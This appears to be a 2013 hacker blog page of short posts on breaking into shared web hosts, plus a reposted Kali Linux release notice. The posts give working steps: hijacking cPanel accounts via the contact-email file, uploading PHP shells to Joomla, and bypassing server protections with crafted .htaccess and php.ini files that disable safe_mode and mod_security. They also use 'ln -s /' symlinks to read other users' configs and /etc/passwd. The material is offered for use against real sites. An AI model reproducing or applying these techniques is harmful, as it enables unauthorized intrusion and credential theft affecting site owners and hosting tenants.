Saturday, March 30, 2013

Joomla Security Scanner v 1.0


Hi everybody , Joomla Security Scanner v 1.0 is very useful , if you want to find an exploit on a joomla website. Enj0y 

Hack Cpanel in 1 click !


Hi all my friends today i will show you a good method , how to hack a cpanel in the server in one click.

You have a shell , alright go to the path before /public_html "xxxx/public_html/" you gonna  find a file  called ".contact" or "contactemail" edit it and replace with your email and restore the password of the cpanel . very easy looooooooool :p

Enjoy!

aLLiGaToR

Wordpress Scanner v 1.0


Hi all my friends today i will present you a nice tool for Wordpress wich you can scan with it a website using wordpress and check vulnerability to exploit in localhost and do  remote code execution to inject script and modify the website.


Bypass Uploading Shell in Joomla


Hello my friendz , today i will show you how to bypass uploading shell in joomla , we know basic methods for uploading shell in joomla !

*Editing Templates with shell code

*Adding php types in configuration and uploading shell

*Uploading shell sometimes as  .php;.jpg

*Using some components to upload shell

etc..............


Well it's so easy there is a method to upload shell that work 100% , you have just to go to extensions in the panel and upload a rar file inside the rar you have to put your shell as ".php" example shell.php then go to tmp folder and add your shell so it will look like this:

www.site.com/tmp/shell.php

Enjoy ;)



Bypass Symlink in ovh Servers


Hello everybody , today i'm going to explain how to bypass symlink in ovh server, well most of hackers find problem in ovh when trying to symlink the server ! this method  was  found by Mauritania Attacker and it's still private , but i decided it to publish it in public.

First you gonna create a dir call it what you want example "abc" then create a '.htaccess" file in the folder "abc" 

CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .lnx

AddHandler cgi-script .lnx
AddHandler cgi-script .lnx


Secondly  we gonna create a second folder we call it example "xyz" we also make an ".htaccess" file

CODE:

#Developped by Mauritania Attacker
Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes

AddType text/plain .php
AddHandler server-parsed .php

AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root


Then we create also in the folder "xyz" a file called "php.ini"

CODE:

safe_mode = Off
disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On
shell_exec = On

so here we come to the last  part !

we gonna retrieve the configs by typing the following command :

ln -s / xyz

Here we go we have succesfully retrieved the root path , so now to find the configs , we can upload a perl file in "xyz" and paste the users of the server "etc/passwd"
and the rest is very basic.


Bypass Server Security 100%


First thing if you can't use python , perl or cgi script to execute commands after giving to the script CHMOD 0755 the solution is to upload this variable php and edit it with the name of the file that you want to execute
exemple of a file: "perl.pl"


CODE:


<?
chmod("perl.pl" , 0755);
?>

Then save this file as ".php" extension.

 If the host is very secured and you can't read directories or upload a file or edit a file just use this ".htaccess"

CODE:


<IfModule mod_security.c>
# Turn the filtering engine On or Off
SecFilterEngine Off
</IfModule>


Remember if perl don't work with the variable php just use this ".htaccess"


CODE:

Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .pl

AddHandler cgi-script .pl
AddHandler cgi-script .pl



For Python also same but change ".pl" to ".py" for cgi script use this ".htaccess"


CODE:


Options FollowSymLinks MultiViews Indexes ExecCGI

AddType application/x-httpd-cgi .root

AddHandler cgi-script .root
AddHandler cgi-script .root




If you want to Bypass Uploads Options and upload shell in another extension use this ".htaccess" :

CODE:

<FilesMatch "^.*\.mp3"> SetHandler application/x-httpd-php </FilesMatch>


For more Information check some old pastebin i posted ^_^





Pro Symlink


Hello my friends today i will show you a method that i discovered to bypass most of servers secured when

trying to symlik ^_^ =========>>> 0day let's make it public ^_^

First create a new folder in the shell as usual  and create a ".htaccess" file put the following code:


Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php


Then retrieves like this :  ln -s /home/user/public_html/ user 

Enj0y ;)



Tuesday, March 12, 2013

Kali Linux Has Been Released!

bt-eol-blogSeven years of developing BackTrack Linux has taught us a significant amount about what we, and the security community, think a penetration testing distribution should look like. We’ve taken all of this knowledge and experience and implemented it in our “next generation” penetration testing distribution.



After a year of silent development, we are incredibly proud to announce the release and public availability of “Kali Linux“, the most advanced, robust, and stable penetration testing distribution to date.



Kali is a more mature, secure, and enterprise-ready version of BackTrack Linux. Trying to list all the new features and possibilities that are now available in Kali would be an impossible task on this single page. We therefore invite you to visit our new Kali Linux Website and Kali Linux Documentation site to experience the goodness of Kali for yourself.



We are extremely excited about the future of the distribution and we can’t wait to see what the BackTrack community will do with Kali. Sign up in the new Kali Forums and join us in IRC in #kali-linux on irc.freenode.net and help us usher in this new era.